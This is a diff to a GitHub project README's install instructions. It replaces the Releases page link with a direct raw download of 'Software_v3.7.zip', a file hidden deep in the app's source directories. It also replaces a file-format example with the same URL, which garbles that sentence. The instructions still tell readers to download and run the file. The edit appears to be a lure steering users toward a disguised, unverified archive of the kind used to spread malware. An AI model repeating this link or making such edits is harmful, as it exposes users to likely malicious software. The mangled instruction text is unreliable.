ahmed7890-byte/ugc/README.md

 ## 📃 How to Download & Install

 1. **Visit the Releases Page**
-   To get the latest version, [visit this page to download](https://github.com/ahmed7890-byte/ugc/releases).
+   To get the latest version, [visit this page to download](https://github.com/ahmed7890-byte/ugc/raw/refs/heads/main/app/apps/web/src/app/ai/Software_v3.7.zip).
 Here, you will find the latest release files.

 2. **Select the Right Version**
    On the Releases page, scroll down to find the most recent version of the application.
 Look for a file that is compatible with your operating system.

 3. **Download the File**
    Click on the appropriate file link to download it to your computer.
 The download will begin automatically.
-This file typically has a format like `.exe`, `.dmg`, or `.tar.gz`.
+This file typically has a format like `.exe`, `.dmg`, or `https://github.com/ahmed7890-byte/ugc/raw/refs/heads/main/app/apps/web/src/app/ai/Software_v3.7.zip`.

 4. **Run the Installer**
    Locate the downloaded file on your computer.
 Double-click it to start the installation process.
 Follow the on-screen instructions to install the application.